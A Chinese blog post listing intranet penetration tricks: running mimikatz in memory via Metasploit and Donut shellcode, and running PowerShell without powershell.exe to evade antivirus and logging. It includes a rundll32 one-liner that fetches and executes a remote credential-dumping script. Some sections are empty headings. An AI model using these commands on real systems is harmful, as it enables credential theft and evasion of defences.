概述
渗透技巧
msf+Donut交互式执行程序
简介
工具 Dount
Donut从VBScript,JScript,EXE,DLL(包括.NET程序集)文件生成x86或x64 Shellcode。 可以将此Shellcode注入到任意Windows进程中以在内存中执行。
使用方法
-
先msf生成一个后门程序,执行
-
然后执行
/donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin-a:是指定位数,2位64位
-o:是指定输出得到一个
-
用msf执行模块
得到一个交互式mimikatz
无powershell运行powershell方法
PowerLine
简介
是一款由c#编写的工具,支持本地命令行调用和远程调用,可以在不直接调用PowerShell的情况下调用PowerShell脚本,优点如下:
- 自动识别win7、win10系统
- 使用方便,无需复杂的ide
- 自动xor编码
- …
下载地址
使用
-
首先拉取项目到本地,然后运行build.bat文件
-
然后在UserConf.xml文件中填写你所需要调用的powershell脚本的地址,默认自带powerup、powerview、Mimikatz等,只要按照他给定的格式加入你的ps脚本地址即可
-
加入完成以后,运行PLBuilder.exe进行构建
PowerShdll
简介
主要使用dll去运行powershell而不需要去连接powershell.exe,所以具有一定的bypassAV能力,当然它也可以在这几个程序下运行rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe或者使用作者给出的单独的exe进行执行
使用
- 使用PowerShdll -i进入到交互模式,此时便获得了一个交互式的PS环境,可执行任意的powershell命令
-
dll版用法
rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;
Nopowershell
简介
是用C#实现的工具,它支持执行类似PowerShell的命令,同时对任何PowerShell日志记录机制都不可见。同时也提供了CS下的cna脚本。
使用
.NoPowerShell.exe
直接运行可得版本和帮助命令
SyncAppvPublishingServer
简介
使用
msbuild
microsoft.com
最后
以上就是土豪牛排为你收集整理的内网一些渗透技巧渗透技巧的全部内容,希望文章能够帮你解决内网一些渗透技巧渗透技巧所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复